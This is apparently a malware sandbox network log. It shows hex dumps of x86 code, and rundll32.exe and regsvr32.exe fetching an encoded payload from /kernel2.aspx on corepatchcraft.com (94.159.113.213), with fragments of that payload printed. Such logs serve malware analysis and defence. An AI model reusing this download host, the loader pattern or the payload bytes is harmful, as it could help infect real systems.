                        2025-01-16 05:02:00 UTC16384INData Raw: 95 64 fd ff ff 89 85 58 fd ff ff 89 b5 5c fd ff ff 8b 8d 64 fd ff ff 3b 8d 5c fd ff ff 72 5d 77 0e 8b 95 60 fd ff ff 3b 95 58 fd ff ff 72 4d 0f b6 45 ef 85 c0 75 0c c7 85 a8 fe ff ff 01 00 00 00 eb 0a c7 85 a8 fe ff ff 00 00 00 00 0f b6 4d ee 0f af 8d a8 fe ff ff 0f b6 15 1e 10 04 10 03 ca 89 0d 20 11 04 10 0f b7 45 e4 c1 f8 07 99 a3 10 11 04 10 89 15 14 11 04 10 eb 11 33 c0 c7 05 08 11 04 10 78 44 00 00 a3 0c 11 04 10 66 8b 4d e4 66 83 c1 01 66 89 4d e4 e9 34 ff ff ff c7 85 64 ff ff ff 2a 00 00 00 8b 15 fc 10 04 10 b8 01 00 00 00 6b c8 39 88 91 c8 1f 04 10 0f b6 55 ee 85 d2 74 29 0f b6 45 ef 05 74 ee 29 5e 33 c9 8b 15 60 11 04 10 8b 35 64 11 04 10 03 d0 13 f1 89 15 60 11 04 10 89 35 64 11 04 10 eb 15 8b 45 ac 03 45 98 8b 4d ac 0b c8 89 4d ac c7 45 ac 56
                        Data Ascii: dX\d;\r]w`;XrMEuM E3xDfMffM4d*k9Ut)Et)^3`5d`5dEEMMEV
                        2025-01-16 05:02:00 UTC16384INData Raw: b6 45 fe f7 d0 99 8b 0d 40 11 04 10 8b 35 44 11 04 10 89 85 20 ff ff ff 89 95 24 ff ff ff 89 8d 18 ff ff ff 89 b5 1c ff ff ff 8b 95 24 ff ff ff 3b 95 1c ff ff ff 7f 24 7c 0e 8b 85 20 ff ff ff 3b 85 18 ff ff ff 77 14 33 c9 c7 85 44 ff ff ff 01 00 00 00 89 8d 48 ff ff ff eb 0b 0f 57 c0 66 0f 13 85 44 ff ff ff 8b 15 78 11 04 10 a1 7c 11 04 10 f7 d2 f7 d0 89 95 10 ff ff ff 89 85 14 ff ff ff 8b 8d 14 ff ff ff 3b 8d 48 ff ff ff 77 65 72 0e 8b 95 10 ff ff ff 3b 95 44 ff ff ff 77 55 83 bd 6c ff ff ff 00 75 09 c7 45 90 01 00 00 00 eb 07 c7 45 90 00 00 00 00 0f be 05 b7 10 04 10 0f b7 0d 5c 11 04 10 2b 0d 18 11 04 10 0f af c1 0f b7 15 5c 11 04 10 f7 d2 0f b7 4d f4 33 d1 8b 0d 18 11 04 10 0f af 4d 90 0f af d1 f7 d2 2b c2 a3 20 11 04 10 eb 61 0f b7 55 f4 f7 d2 85 d2
                        Data Ascii: E@5D $$;$| ;w3DHWfDx|;Hwer;DwUluEE\+\M3M+ aU
                        2025-01-16 05:02:00 UTC16384INData Raw: 75 14 33 c9 c7 85 8c fe ff ff 01 00 00 00 89 8d 90 fe ff ff eb 0b 0f 57 c0 66 0f 13 85 8c fe ff ff 8b 15 10 11 04 10 f7 d2 a1 14 11 04 10 f7 d0 03 95 8c fe ff ff 13 85 90 fe ff ff 89 95 30 fd ff ff 89 85 34 fd ff ff 8b 8d 30 fd ff ff 0b 8d 34 fd ff ff 75 14 33 d2 c7 85 84 fe ff ff 01 00 00 00 89 95 88 fe ff ff eb 0b 0f 57 c0 66 0f 13 85 84 fe ff ff 8b 85 88 fe ff ff 3b 45 d8 7f 2d 7c 0b 8b 8d 84 fe ff ff 3b 4d d4 77 20 0f b6 15 a3 10 04 10 69 c2 95 89 00 00 88 45 e7 0f be 05 1f 10 04 10 99 03 45 c4 a2 1f 10 04 10 eb 14 8b 4d b0 83 e9 25 33 d2 89 4d cc 89 55 d0 b8 d0 2b 01 10 c3 c7 45 fc ff ff ff ff eb 07 c7 45 fc ff ff ff ff e9 2c fe ff ff 66 a1 38 1c 04 10 66 89 45 e0 33 c9 88 4d 9b 68 04 01 00 00 8d 95 14 fa ff ff 52 8d 85 4c fc ff ff 50 8d 4d 9b e8 3a
                        Data Ascii: u3Wf0404u3Wf;E-|;Mw iEEM%3MU+EE,f8fE3MhRLPM:
                        2025-01-16 05:02:01 UTC16384INData Raw: fc 51 8b 4d f8 83 c1 02 e8 2f ad fe ff 66 8b 10 0f b7 c2 50 8b 4d f8 e8 a0 fd ff ff 66 8b f0 8b 4d fc 51 8b 4d f8 83 c1 02 e8 0e ad fe ff 66 89 30 eb bc 6a 0a 8b 4d f8 83 c1 02 e8 fc ac fe ff 33 d2 66 89 10 8b 4d f8 83 c1 02 e8 3c fd ff ff 5e 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 08 53 89 4d f8 c7 45 fc 00 00 00 00 eb 09 8b 45 fc 83 c0 01 89 45 fc 83 7d fc 11 73 32 8b 4d fc 51 8b 4d f8 83 c1 01 e8 8f ac fe ff 8a 10 0f b6 c2 50 8b 4d f8 e8 01 fd ff ff 8a d8 8b 4d fc 51 8b 4d f8 83 c1 01 e8 70 ac fe ff 88 18 eb bf 6a 11 8b 4d f8 83 c1 01 e8 5f ac fe ff c6 00 00 8b 4d f8 83 c1 01 e8 c1 fc ff ff 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 89 4d f8 c7 45 fc 00 00 00 00 eb 09 8b 45 fc 83 c0 01 89 45 fc 83 7d fc 12 73 35 8b
                        Data Ascii: QM/fPMfMQMf0jM3fM<^]USMEEE}s2MQMPMMQMpjM_M[]UVMEEE}s5
                        2025-01-16 05:02:01 UTC16384INData Raw: 89 95 94 fe ff ff 0f bf 05 28 11 04 10 69 c8 96 00 00 00 66 89 0d 5c 11 04 10 8b 95 68 ff ff ff 81 c2 df 00 00 00 89 95 84 fc ff ff 8d 85 4c fc ff ff 50 ff 15 90 31 03 10 a3 fc 10 04 10 8b 0d 38 1c 04 10 89 8d 60 ff ff ff ba 03 00 00 00 66 89 55 e4 a1 08 11 04 10 8b 15 0c 11 04 10 b1 08 e8 37 c4 00 00 a3 18 11 04 10 0f bf 45 e4 89 85 64 ff ff ff 83 bd 64 ff ff ff 01 74 16 83 bd 64 ff ff ff 02 74 28 83 bd 64 ff ff ff 03 74 30 eb 5b eb 59 a1 24 11 04 10 99 8b 4d 90 8b 55 94 89 95 80 fc ff ff 23 c1 a2 1e 10 04 10 eb 3e b8 19 76 0e 00 c7 45 bc c9 9a e4 1a 89 45 c0 eb 2d 0f be 05 1f 10 04 10 2d 46 f1 00 00 99 8b 4d d0 2b c8 8b 45 d4 1b c2 89 4d d0 89 45 d4 0f b6 0d 1e 10 04 10 81 f1 ec 1b 00 00 88 4d eb 8b 95 60 ff ff ff 83 c2 47 89 95 7c fc ff ff a1 80 11 04
                        Data Ascii: (if\hLP18`fU7Eddtdt(dt0[Y$MU#>vEE--FM+EMEM`G|
                        2025-01-16 05:02:01 UTC16384INData Raw: 85 dc fd ff ff 75 16 0f bf 4d e4 0f b7 55 d4 2b ca 0f bf 45 e4 2b c1 66 89 45 e4 eb 59 0f be 05 fb 11 04 10 99 89 85 20 f7 ff ff 89 95 24 f7 ff ff 8b 8d 20 f7 ff ff 3b 4d 88 75 17 8b 95 24 f7 ff ff 3b 55 8c 75 0c c7 85 d8 fd ff ff 01 00 00 00 eb 0a c7 85 d8 fd ff ff 00 00 00 00 a1 a0 12 04 10 03 85 d8 fd ff ff 74 0c 0f bf 45 e4 99 2b 45 c0 66 89 45 e4 e9 ac 00 00 00 8b 0d 98 12 04 10 0b 0d 9c 12 04 10 75 43 0f be 05 ae 11 04 10 83 e8 59 99 8b 0d e0 12 04 10 8b 35 e4 12 04 10 2b c8 1b f2 89 0d e0 12 04 10 89 35 e4 12 04 10 0f be 15 fb 11 04 10 81 c2 99 c7 5a 31 33 c0 89 15 d0 12 04 10 a3 d4 12 04 10 eb 5b 8b 4d 98 8b 75 9c 0f b7 45 d4 99 89 8d 18 f7 ff ff 89 b5 1c f7 ff ff 89 85 10 f7 ff ff 89 95 14 f7 ff ff 8b 95 1c f7 ff ff 3b 95 14 f7 ff ff 7c 2a 7f 0e
                        Data Ascii: uMU+E+fEY $ ;Mu$;UutE+EfEuCY5+5Z13[MuE;|*
                        2025-01-16 05:02:01 UTC16384INData Raw: c0 6b 89 85 4c fa ff ff 33 c9 c7 05 e0 12 04 10 c2 3a 00 00 89 0d e4 12 04 10 8b 0d e0 12 04 10 8b 35 e4 12 04 10 8b 45 90 83 c0 01 99 89 8d b8 f9 ff ff 89 b5 bc f9 ff ff 89 85 b0 f9 ff ff 89 95 b4 f9 ff ff 8b 95 b8 f9 ff ff 3b 95 b0 f9 ff ff 0f 85 6f 03 00 00 8b 85 bc f9 ff ff 3b 85 b4 f9 ff ff 0f 85 5d 03 00 00 0f bf 0d f8 12 04 10 83 f9 01 0f 85 4d 03 00 00 6a 00 68 d2 00 00 00 8b 55 a8 8b 45 ac 89 85 d8 f4 ff ff 0f b6 ca 51 6a 00 8b 15 a0 12 04 10 52 0f b6 45 b8 50 e8 29 38 00 00 83 c4 18 0f b6 c8 89 0d f0 12 04 10 83 3d f0 12 04 10 00 0f 84 c7 02 00 00 6a 00 6a 00 6a 01 8b 55 b0 8b 45 b4 89 85 d4 f4 ff ff 0f b6 ca 51 6a 04 68 cb 00 00 00 e8 ee 37 00 00 83 c4 18 0f b6 d0 89 55 c8 83 7d c8 00 0f 84 76 02 00 00 8b 45 b0 8b 4d b4 89 8d d0 f4 ff ff 0f b6
                        Data Ascii: kL3:5E;o;]MjhUEQjREP)8=jjjUEQjh7U}vEM


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.64971294.159.113.2134436932C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:02 UTC81OUTGET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:02:02 UTC252INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:02 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close
                        2025-01-16 05:02:02 UTC7940INData Raw: 41 51 50 36 54 55 74 4f 63 55 78 64 61 6b 31 49 73 59 35 4d 57 64 4a 4e 53 45 35 78 54 46 6c 71 44 55 68 4f 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 53 45 35 78 54 46 6c 71 54 55 68 4f 0d 0a 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 57 45 39 78 54 46 64 31 39 30 5a 4f 78 55 57 55 53 2f 56 4a 41 72 78 74 44 51 49 6b 4f 32 34 42 50 6a 59 4e 50 79 6b 6a 55 53 38 34 42 43 4d 6e 0d 0a 4f 6c 45 75 50 45 6f 2f 50 53 42 52 4a 54 64 4b 43 51 63 64 55 53 45 32 44 69 68 6d 51 33 78 47 66 57 70 4e 53 45 35 78 54 46 6d 6a 68 65 78 48 2f 4f 57 54 4d 4d 44 68 68 43 76 42 38 4b 41 58 0d 0a 46 70 57 34 46 39 2f 44 68 78 49 51 71 6f 4d 43 52 75 53 43 46 50 70 6b 6c 7a 48 51 34 59 51 72 78 33 47 6a 46 74 44 6e 75 78 59 48 73 59 4d 54 31 64 69 47 41 2b 46 6c 68
                        Data Ascii: AQP6TUtOcUxdak1IsY5MWdJNSE5xTFlqDUhOcUxZak1ITnFMWWpNSE5xTFlqTUhOcUxZak1ITnFMWWpNWE9xTFd190ZOxUWUS/VJArxtDQIkO24BPjYNPykjUS84BCMnOlEuPEo/PSBRJTdKCQcdUSE2DihmQ3xGfWpNSE5xTFmjhexH/OWTMMDhhCvB8KAXFpW4F9/DhxIQqoMCRuSCFPpklzHQ4YQrx3GjFtDnuxYHsYMT1diGA+Flh
                        2025-01-16 05:02:02 UTC16384INData Raw: 7a 35 31 6d 78 67 57 79 6d 61 71 71 61 45 33 44 43 34 33 48 76 44 65 50 54 45 36 39 67 4a 57 6d 67 59 53 43 76 59 43 56 70 6f 47 45 0d 0a 47 2f 71 67 32 6f 5a 6c 77 51 4f 4e 66 35 6e 68 41 4c 54 48 63 4d 55 59 62 73 51 4a 52 76 6f 5a 70 61 30 50 54 45 39 78 54 46 6e 68 43 4c 53 4a 4d 55 52 59 61 6b 31 49 78 54 79 77 6e 6d 73 4a 0d 0a 4c 45 5a 68 78 77 78 6d 78 42 32 6d 2b 67 6c 52 34 77 69 73 78 54 79 77 32 71 74 42 77 51 4f 64 78 77 79 47 78 42 32 32 2b 67 6d 78 34 77 69 6f 78 54 79 6f 30 43 65 52 77 78 75 52 78 31 76 6a 0d 0a 43 4a 44 46 50 4a 44 53 65 38 51 64 75 76 6f 4a 6f 61 31 4e 4c 41 68 35 58 4e 49 6e 74 59 39 50 75 51 70 52 65 73 59 64 74 76 6f 4a 72 65 4d 50 54 4d 30 4d 75 46 6b 66 52 49 38 4c 67 55 78 5a 0d 0a 61 6b 32 6a 52 2f 6f 42 72 57 6b
                        Data Ascii: z51mxgWymaqqaE3DC43HvDePTE69gJWmgYSCvYCVpoGEG/qg2oZlwQONf5nhALTHcMUYbsQJRvoZpa0PTE9xTFnhCLSJMURYak1IxTywnmsJLEZhxwxmxB2m+glR4wisxTyw2qtBwQOdxwyGxB22+gmx4wioxTyo0CeRwxuRx1vjCJDFPJDSe8QduvoJoa1NLAh5XNIntY9PuQpResYdtvoJreMPTM0MuFkfRI8LgUxZak2jR/oBrWk
                        2025-01-16 05:02:02 UTC16384INData Raw: 70 6f 47 45 67 72 30 5a 30 6f 59 6e 74 79 59 52 72 56 35 36 4b 65 6c 4f 63 55 78 5a 0d 0a 4f 69 6e 42 61 33 46 4d 57 57 6f 63 79 36 4a 74 48 77 38 39 78 43 32 2b 2b 41 47 78 34 51 69 67 78 7a 53 51 30 69 65 52 77 51 4f 52 78 77 79 4b 78 6b 72 48 4e 4b 6a 53 4a 30 56 48 38 43 42 42 0d 0a 33 4c 68 43 7a 66 39 78 54 46 6e 68 43 45 44 4e 73 56 77 4a 34 51 43 67 70 6b 69 2f 70 70 58 45 44 61 4c 36 41 62 58 68 47 45 54 48 49 45 6a 53 4c 36 48 44 41 33 6e 47 43 47 62 46 47 45 4c 36 0d 0a 43 62 31 6c 38 77 42 44 39 49 55 74 62 4d 59 64 6f 76 67 5a 76 61 30 49 74 45 35 78 54 46 6e 68 43 4b 51 65 2b 67 46 52 34 56 77 61 78 54 79 6b 73 51 32 79 74 37 48 34 43 59 48 68 43 4b 54 46 0d 0a 50 4a 54 51 59 73 59 64 6f 69 50 48 48 47 4c 47 41 45 59 67 78 78 53 43 70 51 47
                        Data Ascii: poGEgr0Z0oYntyYRrV56KelOcUxZOinBa3FMWWocy6JtHw89xC2++AGx4QigxzSQ0ieRwQORxwyKxkrHNKjSJ0VH8CBB3LhCzf9xTFnhCEDNsVwJ4QCgpki/ppXEDaL6AbXhGETHIEjSL6HDA3nGCGbFGEL6Cb1l8wBD9IUtbMYdovgZva0ItE5xTFnhCKQe+gFR4VwaxTyksQ2yt7H4CYHhCKTFPJTQYsYdoiPHHGLGAEYgxxSCpQG
                        2025-01-16 05:02:02 UTC16384INData Raw: 74 37 46 43 6a 4a 69 4b 54 55 76 4c 0d 0a 76 62 4b 6d 6c 63 54 4e 68 6f 2b 7a 70 75 45 41 75 4d 63 38 2f 4e 4c 2f 68 62 61 78 6a 73 55 4d 78 73 59 4e 51 76 6f 42 53 65 50 49 61 4c 47 4f 73 39 44 6e 61 62 65 78 6a 71 64 4c 34 52 6a 34 0d 0a 7a 5a 74 4e 30 44 2f 39 77 77 76 64 7a 35 6c 72 78 41 33 69 38 6a 48 70 61 6a 74 6f 77 2f 78 73 70 70 57 79 77 63 4f 31 73 71 61 56 78 68 33 69 66 76 70 62 4f 73 62 46 69 6f 2b 7a 70 6f 4b 77 0d 0a 57 30 39 78 70 35 48 68 77 47 69 78 6a 72 50 53 2f 32 6d 33 73 59 37 46 31 44 4b 7a 74 37 48 34 32 51 57 55 73 72 66 46 39 42 53 6e 6c 62 4c 44 77 79 32 79 70 70 58 45 44 55 4c 34 41 55 6d 44 0d 0a 7a 55 70 4f 63 63 30 6b 77 6b 31 4a 54 6e 46 44 33 42 4a 4d 53 45 37 38 32 58 6d 55 73 72 66 48 4a 4f 6a 53 4c 2b 6e 42 79 7a 47
                        Data Ascii: t7FCjJiKTUvLvbKmlcTNho+zpuEAuMc8/NL/hbaxjsUMxsYNQvoBSePIaLGOs9DnabexjqdL4Rj4zZtN0D/9wwvdz5lrxA3i8jHpajtow/xsppWywcO1sqaVxh3ifvpbOsbFio+zpoKwW09xp5HhwGixjrPS/2m3sY7F1DKzt7H42QWUsrfF9BSnlbLDwy2yppXEDUL4AUmDzUpOcc0kwk1JTnFD3BJMSE782XmUsrfHJOjSL+nByzG
                        2025-01-16 05:02:02 UTC16384INData Raw: 31 47 2b 42 6d 4a 34 51 6a 38 78 7a 53 59 30 69 65 5a 77 51 4f 35 78 77 79 36 78 42 32 43 2b 67 6d 56 4f 73 59 46 68 70 6d 77 38 47 70 4e 49 6b 37 38 41 65 6b 37 70 55 6e 45 6a 72 50 61 0d 0a 72 6b 56 48 2b 4b 48 4a 69 78 39 61 49 46 68 4e 54 46 6b 43 6e 51 35 47 59 53 52 42 4e 30 56 59 70 69 46 50 58 32 72 4f 6a 45 4b 32 43 5a 31 71 54 55 68 4f 2f 41 48 74 34 77 43 67 78 53 53 6b 0d 0a 30 6d 6a 45 44 59 37 36 41 62 48 68 47 49 7a 48 59 4d 63 63 71 73 51 4e 38 76 6f 42 35 65 4d 41 38 49 6b 30 73 4b 61 56 73 72 66 44 50 50 79 78 63 70 46 49 54 76 6f 4a 34 65 45 41 76 43 72 34 0d 0a 51 56 6c 71 54 55 6a 46 6c 42 47 61 70 6f 47 45 67 72 32 41 6c 54 2f 47 70 4d 32 64 43 4e 51 76 73 73 45 4c 67 53 5a 59 35 77 43 33 48 35 6d 46 4f 47 68 4e 79 34 70 35 78 52 79
                        Data Ascii: 1G+BmJ4Qj8xzSY0ieZwQO5xwy6xB2C+gmVOsYFhpmw8GpNIk78Aek7pUnEjrParkVH+KHJix9aIFhNTFkCnQ5GYSRBN0VYpiFPX2rOjEK2CZ1qTUhO/AHt4wCgxSSk0mjEDY76AbHhGIzHYMccqsQN8voB5eMA8Ik0sKaVsrfDPPyxcpFITvoJ4eEAvCr4QVlqTUjFlBGapoGEgr2AlT/GpM2dCNQvssELgSZY5wC3H5mFOGhNy4p5xRy
                        2025-01-16 05:02:02 UTC16384INData Raw: 58 46 48 4f 4c 30 54 45 35 78 54 44 4b 37 73 73 4d 4c 2b 55 38 4a 62 73 51 64 79 76 6f 42 33 65 46 63 77 52 76 78 78 78 7a 71 7a 58 42 50 0d 0a 42 45 57 65 4c 35 46 4a 54 6e 46 4d 73 6d 32 4b 44 5a 4a 78 54 46 6c 71 78 77 57 53 2b 51 47 75 5a 66 73 64 75 66 53 65 4c 48 30 6c 51 56 78 78 54 44 47 36 43 30 42 65 47 65 41 36 59 6c 32 67 0d 0a 39 36 56 4a 57 65 6d 4a 52 4d 55 38 73 4e 6f 54 58 55 67 37 5a 69 52 54 65 45 31 49 4a 71 45 4b 55 58 6f 6c 6f 43 31 35 58 4c 48 7a 6d 55 31 4f 38 6f 68 56 34 51 68 41 78 2f 51 77 70 70 57 79 0d 0a 79 36 4a 68 78 35 58 6a 36 44 69 78 6a 72 50 53 2f 7a 47 33 73 59 34 65 73 59 4d 4a 74 37 48 36 43 61 58 68 42 56 69 6d 6e 2f 68 5a 61 73 59 46 73 76 6f 4e 53 65 47 6f 46 59 78 31 54 4a 57 6d 0d 0a 47 4d 4f 69 47 37 4d 78 78
                        Data Ascii: XFHOL0TE5xTDK7ssML+U8JbsQdyvoB3eFcwRvxxxzqzXBPBEWeL5FJTnFMsm2KDZJxTFlqxwWS+QGuZfsdufSeLH0lQVxxTDG6C0BeGeA6Yl2g96VJWemJRMU8sNoTXUg7ZiRTeE1IJqEKUXoloC15XLHzmU1O8ohV4QhAx/QwppWyy6Jhx5Xj6DixjrPS/zG3sY4esYMJt7H6CaXhBVimn/hZasYFsvoNSeGoFYx1TJWmGMOiG7Mxx
                        2025-01-16 05:02:02 UTC16384INData Raw: 41 36 53 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 37 6d 6b 66 47 46 50 53 45 48 48 43 5a 45 36 0d 0a 77 41 57 65 6d 58 51 63 61 45 33 44 43 33 6d 6c 51 6d 68 4e 53 4d 55 38 76 4e 71 72 53 63 48 44 67 62 4b 6d 6c 66 64 4d 54 6e 46 4d 4d 71 69 79 77 38 4f 42 73 71 61 56 54 67 6c 4b 2b 4d 6d 31 0d 0a 6c 4c 4b 33 78 65 53 67 70 35 57 79 77 30 7a 34 79 62 47 55 73 72 66 46 2f 4b 53 6e 6c 62 4c 49 64 33 41 35 55 4b 30 49 36 45 39 78 54 46 6d 42 53 6f 38 4c 30 55 78 5a 61 6b 33 43 47 39 48 45 0d 0a 44 4c 56 43 2f 67 75 75 79 5a 6b 66 57 69 42 70 59 6b 78 5a 41 70 30 4f 52 6d 45 6b 39 51 6c 46 57 4b 61 65 36 56 78 71 7a 6f 78 43 2b 68 6d 70 36 54 64 6b 54 67 52 46 6e 69 2f 52 53 55 35 78 0d 0a 54 4c 4a 74 69 67 33 53 63 55 78 5a 61 73 63 4e 30 76 6b 4a 68 32 58 37 42
                        Data Ascii: A6SY8LjbOmlbLFA7mkfGFPSEHHCZE6wAWemXQcaE3DC3mlQmhNSMU8vNqrScHDgbKmlfdMTnFMMqiyw8OBsqaVTglK+Mm1lLK3xeSgp5Wyw0z4ybGUsrfF/KSnlbLId3A5UK0I6E9xTFmBSo8L0UxZak3CG9HEDLVC/guuyZkfWiBpYkxZAp0ORmEk9QlFWKae6VxqzoxC+hmp6TdkTgRFni/RSU5xTLJtig3ScUxZascN0vkJh2X7B
                        2025-01-16 05:02:02 UTC16384INData Raw: 4b 33 39 48 42 4d 57 57 72 49 6d 6a 74 71 0d 0a 69 68 79 6f 54 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 36 32 6b 31 4b 4e 4d 53 4d 51 30 6a 72 41 7a 51 45 68 4f 6d 43 31 64 61 6b 33 44 43 34 48 50 6d 54 49 64 77 77 4e 35 70 4c 6a 41 73 72 66 33 0d 0a 63 45 78 5a 61 73 69 42 4f 32 71 4b 48 4b 74 4e 6a 77 75 4e 73 36 61 56 73 73 55 44 72 61 51 4d 6f 30 78 49 78 44 53 4e 73 45 74 41 53 45 36 59 5a 56 31 71 54 63 4d 62 67 63 66 62 36 6b 31 49 0d 0a 54 76 72 47 33 57 70 4e 53 4d 66 30 4d 4b 53 56 73 73 48 44 38 62 47 6d 6c 63 62 64 4d 6f 79 7a 70 75 48 49 79 4c 4f 4f 73 39 44 2f 4c 62 57 78 6a 73 58 63 44 72 43 33 73 66 7a 42 4f 5a 65 79 0d 0a 74 78 2f 36 41 56 47 43 69 2f 61 78 6a 76 5a 59 61 6b 31 49 79 36 4d 35 51 71 77 49 69 45 36 32 43 61 57 56 73 72 65 78 2f
                        Data Ascii: K39HBMWWrImjtqihyoTY8LjbOmlbLFA62k1KNMSMQ0jrAzQEhOmC1dak3DC4HPmTIdwwN5pLjAsrf3cExZasiBO2qKHKtNjwuNs6aVssUDraQMo0xIxDSNsEtASE6YZV1qTcMbgcfb6k1ITvrG3WpNSMf0MKSVssHD8bGmlcbdMoyzpuHIyLOOs9D/LbWxjsXcDrC3sfzBOZeytx/6AVGCi/axjvZYak1Iy6M5QqwIiE62CaWVsrex/
                        2025-01-16 05:02:02 UTC16384INData Raw: 42 61 72 36 47 62 32 74 54 30 68 4f 63 55 7a 53 4c 36 6d 50 44 6e 56 4d 57 57 70 4e 77 77 4f 56 69 78 68 69 54 55 68 4f 63 59 6f 63 6c 6b 7a 44 47 35 6e 50 6d 33 72 45 48 5a 4c 36 43 59 58 6a 0d 0a 43 49 7a 44 50 4c 34 49 5a 66 73 64 76 79 50 48 46 4b 36 6c 4e 66 47 50 73 39 49 76 6b 59 38 4f 66 55 78 5a 61 6b 32 4f 43 34 31 4f 30 69 65 6c 79 34 39 52 78 52 53 79 78 68 32 57 2b 42 6d 5a 0d 0a 35 77 69 34 48 6e 37 36 46 49 55 63 77 77 4f 78 70 42 62 56 73 37 66 46 4a 4a 53 65 4b 45 46 49 54 6e 46 4d 6e 79 2b 78 53 38 55 30 70 4a 34 71 66 55 68 4f 63 55 7a 53 4a 36 57 4f 44 30 56 4d 0d 0a 30 6a 2b 6c 79 34 78 4a 78 51 79 2b 39 55 78 4f 63 55 77 79 6f 6b 54 44 47 36 57 4c 58 57 42 4e 53 45 35 78 69 68 79 57 53 63 55 4c 66 52 7a 53 4a 35 6d 67 4f 2b 4a 4e 57
                        Data Ascii: Bar6Gb2tT0hOcUzSL6mPDnVMWWpNwwOVixhiTUhOcYoclkzDG5nPm3rEHZL6CYXjCIzDPL4IZfsdvyPHFK6lNfGPs9IvkY8OfUxZak2OC41O0iely49RxRSyxh2W+BmZ5wi4Hn76FIUcwwOxpBbVs7fFJJSeKEFITnFMny+xS8U0pJ4qfUhOcUzSJ6WOD0VM0j+ly4xJxQy+9UxOcUwyokTDG6WLXWBNSE5xihyWScULfRzSJ5mgO+JNW
                        2025-01-16 05:02:02 UTC16384INData Raw: 6d 58 67 62 62 6b 32 50 43 34 32 7a 70 70 57 79 78 51 50 4e 70 43 6b 45 54 45 6a 46 4e 4b 44 61 55 6b 30 39 57 52 6d 6a 66 47 70 4e 49 4a 34 33 0d 0a 52 45 6b 43 34 52 78 47 59 61 54 6f 63 45 68 49 7a 62 56 41 30 6a 2b 68 77 30 7a 37 52 4e 45 6e 70 63 67 7a 6d 55 30 74 59 73 30 31 70 6e 4d 34 63 6f 45 66 77 78 75 64 78 78 78 69 78 67 4a 4b 0d 0a 53 67 52 64 48 30 53 50 43 35 56 4e 57 57 70 4e 6f 30 6d 32 43 62 31 71 54 55 68 4f 2b 78 6d 39 34 68 69 37 78 44 53 2f 73 6a 62 47 44 61 4c 36 41 56 48 68 48 55 42 31 49 45 51 73 59 34 6f 4e 0d 0a 72 6e 42 4d 57 57 71 6d 54 34 6b 30 72 46 6c 71 54 55 6a 45 4e 4b 7a 52 4c 37 2f 43 43 34 4f 6e 61 75 45 41 51 4d 55 67 51 4e 41 2f 6d 63 4d 4c 6e 63 63 52 5a 73 51 46 6c 76 6f 5a 67 56 45 59 0d 0a 6e 44 74 34 69 78 79
                        Data Ascii: mXgbbk2PC42zppWyxQPNpCkETEjFNKDaUk09WRmjfGpNIJ43REkC4RxGYaTocEhIzbVA0j+hw0z7RNEnpcgzmU0tYs01pnM4coEfwxudxxxixgJKSgRdH0SPC5VNWWpNo0m2Cb1qTUhO+xm94hi7xDS/sjbGDaL6AVHhHUB1IEQsY4oNrnBMWWqmT4k0rFlqTUjENKzRL7/CC4OnauEAQMUgQNA/mcMLnccRZsQFlvoZgVEYnDt4ixy


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.64971394.159.113.2134436744C:\Windows\SysWOW64\regsvr32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:03 UTC81OUTGET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:02:03 UTC252INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close
                        2025-01-16 05:02:03 UTC7940INData Raw: 41 51 50 36 54 55 74 4f 63 55 78 64 61 6b 31 49 73 59 35 4d 57 64 4a 4e 53 45 35 78 54 46 6c 71 44 55 68 4f 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 53 45 35 78 54 46 6c 71 54 55 68 4f 0d 0a 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 57 45 39 78 54 46 64 31 39 30 5a 4f 78 55 57 55 53 2f 56 4a 41 72 78 74 44 51 49 6b 4f 32 34 42 50 6a 59 4e 50 79 6b 6a 55 53 38 34 42 43 4d 6e 0d 0a 4f 6c 45 75 50 45 6f 2f 50 53 42 52 4a 54 64 4b 43 51 63 64 55 53 45 32 44 69 68 6d 51 33 78 47 66 57 70 4e 53 45 35 78 54 46 6d 6a 68 65 78 48 2f 4f 57 54 4d 4d 44 68 68 43 76 42 38 4b 41 58 0d 0a 46 70 57 34 46 39 2f 44 68 78 49 51 71 6f 4d 43 52 75 53 43 46 50 70 6b 6c 7a 48 51 34 59 51 72 78 33 47 6a 46 74 44 6e 75 78 59 48 73 59 4d 54 31 64 69 47 41 2b 46 6c 68
                        Data Ascii: AQP6TUtOcUxdak1IsY5MWdJNSE5xTFlqDUhOcUxZak1ITnFMWWpNSE5xTFlqTUhOcUxZak1ITnFMWWpNWE9xTFd190ZOxUWUS/VJArxtDQIkO24BPjYNPykjUS84BCMnOlEuPEo/PSBRJTdKCQcdUSE2DihmQ3xGfWpNSE5xTFmjhexH/OWTMMDhhCvB8KAXFpW4F9/DhxIQqoMCRuSCFPpklzHQ4YQrx3GjFtDnuxYHsYMT1diGA+Flh
